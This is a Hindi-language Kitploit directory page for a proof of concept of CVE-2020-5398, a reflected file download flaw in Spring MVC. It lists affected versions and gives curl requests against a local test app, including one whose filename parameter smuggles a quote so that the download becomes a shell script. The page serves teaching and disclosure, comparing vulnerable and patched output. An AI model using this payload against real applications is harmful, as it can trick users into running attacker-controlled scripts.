Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-5398 — CVE-2020-5398 - Spring MVC के लिए RFD (Reflected File Download) हमला | Kitploit
उपकरण/GitHubGitHub/motikan2010/cve-2020-5398
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmotikan2010/cve-2020-5398

CVE-2020-5398

CVE-2020-5398 - Spring MVC के लिए RFD (Reflected File Download) हमला

रिपॉजिटरी देखें
84183 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-5398 - स्प्रिंग MVC के लिए RFD (रिफ्लेक्टेड फ़ाइल डाउनलोड) हमला

स्प्रिंग फ्रेमवर्क में, संस्करण 5.2.x जो 5.2.3 से पहले हैं, संस्करण 5.1.x जो 5.1.13 से पहले हैं, और संस्करण 5.0.x जो 5.0.16 से पहले हैं, कोई एप्लिकेशन रिफ्लेक्टेड फ़ाइल डाउनलोड (RFD) हमले के लिए संवेदनशील है जब वह प्रतिक्रिया में "Content-Disposition" हेडर सेट करता है जहाँ फ़ाइल नाम विशेषता उपयोगकर्ता द्वारा प्रदत्त इनपुट से ली गई हो।

उपयोग

root@kitploit:~
./gradlew bootrun

127.0.0.1:8080 पर सुनें।

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.txt"
Content-Type: application/octet-stream
Content-Length: 12
Date: Fri, 17 Jan 2020 05:41:08 GMT

Hello, World

sample.txt फ़ाइल डाउनलोड करना शुरू करें।

PoC

असुरक्षित संस्करण (स्प्रिंग वेब 5.2.2)

root@kitploit:~
curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT

#!/bin/bash
id

sample.sh फ़ाइल डाउनलोड करना शुरू करें। (शेल फ़ाइल)

सुरक्षित संस्करण (स्प्रिंग वेब 5.2.3)

root@kitploit:~
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT

#!/bin/bash
id

sample.sh";.txt फ़ाइल डाउनलोड करना शुरू करें। (टेक्स्ट फ़ाइल)

संदर्भ

  • CVE-2020-5398: स्प्रिंग MVC या स्प्रिंग WebFlux एप्लिकेशन द्वारा अनुरोध इनपुट से प्राप्त "Content-Disposition" हेडर के माध्यम से RFD हमला | सुरक्षा | Pivotal
  • NVD - CVE-2020-5398
  • RFD हमला क्या है?
    • eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
    • रिफ्लेक्टेड फ़ाइल डाउनलोड - OWASP
  • फिक्स कमिट
    • ContentDisposition पुनर्रचना · spring-projects/spring-framework@956ffe6
टूल डाउनलोड करें